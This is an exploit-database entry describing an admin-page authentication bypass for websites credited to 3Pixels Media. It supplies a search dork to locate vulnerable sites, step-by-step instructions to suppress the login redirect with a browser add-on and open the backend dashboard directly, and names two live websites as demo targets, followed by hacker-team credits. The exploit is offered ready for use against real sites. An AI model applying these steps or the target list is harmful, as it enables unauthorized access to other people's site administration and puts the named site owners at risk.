3Pixels Media Admin Page Bypass

2016-04-11 / 2016-04-14
Credit: 1337r00t
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: Admin Page Bypass [ 3Pixels Media ] By 1337r00t |[+] |[+] Exploit Author: 1337r00t - T34m D4rkn3ss R00m Fr0m Saudi Arabia |[+] |[+] Vendor Homepage: http://www.3pixelsltd.com/ |[+] |[+] Google Dork: intext:Site Credits: 3Pixels® Media |[+] |[+] Tested on: Windows 10 , Mozilla Firefox |[+] |[+] Date: 9/4/2016 |[+] |--------------------------------------------------------------| |[+] Exploit : |[+] |[+] Note: Download Tool [NoRedirect] On addons Mozilla Firefox |[+] |[+] |[+] Admin Url :- |[+] http://[$Site]/backend/ |[+] |[+] |[+] |[+] 1- Run Tool NoRedirect |[+] 2- Add Site New |[+] 3- Add: ^[$site]/backend/ |[+] 4- Open Link : http://[$site]/backend/dashboard.php |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+] http://www.sixthsensedecor.com/backend/ |[+] http://whistleschildrensplace.com/backend/ |[+] |--------------------------------------------------------------| |[+] My Accounts :- |[+] |[+] Twitter:1337r00t |[+] Instagram: 1337r00t |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] G2 Team :- |[+] Members: T34m D4rkn3ss R00m:- |[+] 1- Nine9 |[+] 2- [C]oder Girl: Safaa Hacker |[+] 3- xIL3zr |[+] 4- FreeDom |[+] 5- MjHoL HackEr |[+] 6- Hurabii HaCkEr |[+] 7- BL4ck M4n |[+]-------------------------------------------[+] |[+] G2 Friends : Killer~X - 3NeeDaN HacKeR - Saudi HeX - 1337kSa - All My Friends |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : 1337r00t |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top